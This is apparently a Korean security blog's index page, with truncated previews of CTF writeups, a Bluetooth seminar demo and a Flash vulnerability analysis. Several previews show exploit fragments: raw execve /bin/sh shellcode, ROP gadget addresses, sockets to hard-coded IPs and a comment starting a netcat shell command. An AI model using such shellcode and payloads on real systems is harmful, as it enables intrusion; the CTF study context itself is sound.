목록blackcon (124)
Hello, Stranger
2014년 1월에 처음으로 열린 경남권 세미나에서 발표한 "Bluetooth Security"의 Demo코드를 공개하겠습니다. 블루투스를 공부하면서 스마트폰을 제어할 수 있는 코드를 작성해봤는데요. 구조는 아주 간단하니 다 보이실거에요^^ ※악용의 소지가 될 수 있으므로 사용법은 공개하지 않겠습니다. (질문 환영입니다~!! 물론 태클도 환영해요. 점프연습 많이 해둘게요 ㅋㅋ 다 피해버리겠어 +_+) Atcomman..
import socket import struct ip = "192.168.0.14" port = 6776 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #payload = [strcpy] [pp ret] [freespace] [0xFF] [strcpy] [pp ret] [freespace+1] [0xE4] [freespace] [shellcode] # or [strcpy] [pp ..
#!/usr/bin/python from socket import * shellcode = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" payload = "" payload += "-4..
#!/usr/bin/env python import socket import struct host = '127.0.0.1' port = 7777 p = lambda x: struct.pack("<L", x) recv_plt = 0x8048780 freespace= 0x804b0a0 pppr = 0x08048d35 ppppr = 0x80493ac fd = 8 #shellcode : /bin/sh -c nc 192..
2012년에 등장한 Adobe Flash Player mp4 cprt 취약점을 분석했습니다. Heap Spraying 기법과 같이 작성했으니 도움됐으면 좋겠네요 :D
#include <stdio.h>#include <iostream>using namespace std;void out(int *a){ printf("%d\n", a[0]); for(int i = 0; i < 10;i++){ for(int j = 0; j < 10; j++){ if((2*j+1) == i) printf("%d, %d\n", a[i], i); /*왼쪽 출력*/ else if((2*j+2) == ..
올해 hust는 8단계까지 풀어서 아쉬웠네요.. 풀이는 1stage부터 2stage 8번까지 입니다. 난해한 문제가 많았던 대회....모두 수고하셨습니다!! :)
2013 Cscamp CTF writeup
Forensics 1.-----------------------------------------------------------------------------------------------Databases are very critical. Thats why there is an always backup of the database.Our database admin, John, had an attack and he lost all informati..
2013 Cscamp CTF writeup
Reversing1(vb for life)File : vb.net (Visual Basic Dot NET)Using tool : NET refletor ( discompile for .NET )#1. Check_password#2. Resource ( password, flag ) : but It's is not the real key#3. attack.py#4. Get the flag!!!!![Hello SAM, The flag is db..